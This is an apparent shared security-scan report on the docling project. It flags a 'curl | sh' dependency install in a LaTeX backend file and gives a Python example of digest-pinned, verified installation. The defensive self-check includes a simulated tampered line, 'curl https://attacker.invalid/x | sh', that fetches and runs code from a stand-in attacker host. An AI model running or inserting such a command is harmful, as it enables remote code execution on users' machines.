QuantumScan
docling-project/docling
The scan reports one finding, rated critical, in the LaTeX backend engine component. The flagged curl invocation enforces TLS 1.2 as its minimum protocol version (it does not permit TLS 1.0 or 1.1), so the "TLS 1.0 / 1.1" label in the table below does not describe a protocol weakness in the command itself. The concern is the install pattern: the command pipes a downloaded script straight into a shell ('curl | sh') to install an external dependency, so whoever can change the script that the server returns gains code execution on the host, with no local checksum or signature check in between. This is a LaTeX backend engine component, so the business impact of a compromise is rated moderate.
| File | Algorithm | Severity | Business impact |
|---|---|---|---|
| docling/backend/latex/engines/tectonic.py:86 | TLS 1.0 / 1.1 | critical | 45 |
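As an added example (not code from docling, tectonic or QuantumScan), the snippet below shows the hardened shape of a dependency-install step that replaces the 'curl | sh' pattern flagged above, in Python because the flagged file is Python. It keeps what the original command already gets right (TLS 1.2 as the minimum version, certificate verification) and adds the two pieces a supply-chain reviewer expects: the script is written to a file and checked against a pinned SHA-256 digest before anything is executed, and it is then run without `shell=True`. The installer URL, the pinned digest and the sample installer content are constructed placeholders, and `fetch_verify_run` makes a network call that the offline self-check does not exercise.

```python
"""Hardened replacement for a `curl ... | sh` install step (added example)."""
import hashlib
import hmac
import os
import ssl
import subprocess
import tempfile
import urllib.request

# Constructed sample: stands in for the installer script a real step would fetch.
SAMPLE_INSTALLER = b"#!/bin/sh\necho 'constructed sample installer: does nothing'\n"


def tls12_min_context() -> ssl.SSLContext:
    """Client context that verifies the chain and hostname and refuses TLS 1.0/1.1."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def check_installer_url(url: str) -> bool:
    """Only HTTPS is acceptable; a plain-HTTP installer can be swapped in transit."""
    return url.startswith("https://")


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_digest(path: str, expected_hex: str) -> bool:
    """Compare the downloaded file against the digest pinned in the repository."""
    return hmac.compare_digest(sha256_of(path), expected_hex.lower())


def download(url: str, dest: str) -> None:
    """Fetch `url` to `dest` over HTTPS with TLS >= 1.2 (network call)."""
    if not check_installer_url(url):
        raise ValueError("refusing non-HTTPS installer URL")
    with urllib.request.urlopen(url, context=tls12_min_context(), timeout=30) as r:
        with open(dest, "wb") as out:
            for chunk in iter(lambda: r.read(65536), b""):
                out.write(chunk)


def fetch_verify_run(url: str, pinned_sha256: str, interpreter: str = "sh") -> int:
    """Download, verify, then execute: the script never reaches a shell unverified."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    os.close(fd)
    try:
        download(url, path)
        if not verify_digest(path, pinned_sha256):
            raise RuntimeError("installer digest mismatch; refusing to execute")
        # Argument list, not a shell string: the URL or path cannot inject commands.
        return subprocess.run([interpreter, path], check=False).returncode
    finally:
        os.unlink(path)


def selfcheck() -> dict:
    """Offline demonstration on the constructed sample: genuine passes, tampered fails."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "wb") as f:
        f.write(SAMPLE_INSTALLER)
    try:
        pinned = hashlib.sha256(SAMPLE_INSTALLER).hexdigest()
        genuine_ok = verify_digest(path, pinned)
        # Simulate a modified script served from the same URL.
        with open(path, "wb") as f:
            f.write(SAMPLE_INSTALLER + b"curl https://attacker.invalid/x | sh\n")
        tampered_ok = verify_digest(path, pinned)
    finally:
        os.unlink(path)
    return {
        "genuine_ok": genuine_ok,
        "tampered_ok": tampered_ok,
        "min_tls": tls12_min_context().minimum_version.name,
    }


if __name__ == "__main__":
    print(selfcheck())
```

The pinned digest must live in the repository (or a lock file) next to the URL, so that a changed upstream script fails closed until someone reviews the new content and updates the pin; a digest fetched from the same server as the script adds nothing.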
Shared report: https://quantumscan.io/en/share/08229c4f-34e6-4c48-902f-6349e6b5f83f (risk score and top findings viewable without sign-in; source code is not shared).